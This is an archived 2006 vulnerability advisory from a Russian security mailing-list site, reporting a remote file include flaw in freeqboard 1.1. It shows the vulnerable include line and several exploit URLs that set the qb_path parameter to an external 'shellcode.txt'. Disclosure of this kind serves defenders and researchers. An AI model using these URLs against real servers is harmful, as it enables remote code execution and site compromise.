Информационная безопасность
[RU] switch to English


Дополнительная информация

  Ежедневная сводка ошибок в Web-приложениях (PHP, ASP, JSP, CGI, Perl )

  [Aria-Security Team] DuWare DuClassMate SQL Injection Vuln

  [Aria-Security Team] DuWare DuNews SQL Injection Vuln

  Ultimate HelpDesk All Version (Source/XSS) Vulnerabilities

  Aspee Ziyareti Defteri (tr) Sql injection Vuln.

From:-= SHELL =- -= SHELL =- <she1l_(at)_hotmail.com>
Date:2 декабря 2006 г.
Subject:freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability

##################################################
#                                                                            
                                #
# freeqboard <= 1.1 (qb_path) Remote File Include Vulnerability              
      #
#                                                                            
                                #
# Author: Mr.3FReeT                                                          
                     #
#                                                                            
                                #
# Softname: freeqboard                                                       
                    #
#                                                                            
                                #
##################################################
#
# code in :
# about.php  ,  contact.php  ,  delete.php  ,  faq.php  ,  index.php
#
# include "config.php";
# include $qb_path."incs/mysql.php";
#
##################################################
#
# Exploit :
# """"""""
#
# www.site.com/[path]/index.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/faq.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/delete.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/contact.php?qb_path=shellcode.txt?
#
# www.site.com/[path]/about.php?qb_path=shellcode.txt?
#
##################################################
#
# GreeTz: [ Dr.2 ] , [ ToOoFa ] , [ General C ] , [ asbmay ] , [ q8i^rock ]
, [ SHiKaA ] & KuW SeC TeaM
#
##################################################

_________________________________________________________________
Express yourself instantly with MSN Messenger! Download today it's FREE!
http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/

О сайте | Условия использования
© SecurityVulns, 3APA3A, Владимир Дубровин
Нижний Новгород